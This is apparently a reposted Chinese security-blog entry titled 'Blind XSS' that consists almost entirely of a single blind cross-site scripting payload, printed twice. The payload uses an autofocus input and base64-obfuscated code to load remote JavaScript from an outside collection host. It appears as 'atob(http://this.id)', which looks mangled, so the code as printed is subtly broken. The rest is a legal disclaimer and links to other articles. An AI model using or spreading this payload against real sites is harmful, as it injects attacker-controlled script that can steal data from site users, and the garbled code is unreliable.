Blind XSS

2022年6月7日00:11:29评论26 views字数 406阅读1分21秒阅读模式

Payload：

"><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2x3YS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>

"><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2x3YS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>

Blind XSS

原文始发于微信公众号（Khan安全攻防实验室）：Blind XSS

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Blind XSS

企业软件与AI原生应用

利用钉钉安装程序加载的银狐样本分析

利用 PDF 漏洞进行高级 SSRF

优化！多重加解密的解决方案codecflow！

黑客防溯源生存指南—用姨妈巾屏蔽wifi信号

微软可信签名服务遭恶意滥用！三天有效证书成黑客隐身衣

使用DarwinOps设置和武装Mythic C2以针对MacOS

fastjson【1224rce】漏洞初探索及复现

vulhub靶场，基于docker的环境搭建

使用命令行混淆绕过检测

发表评论

在线咨询

微信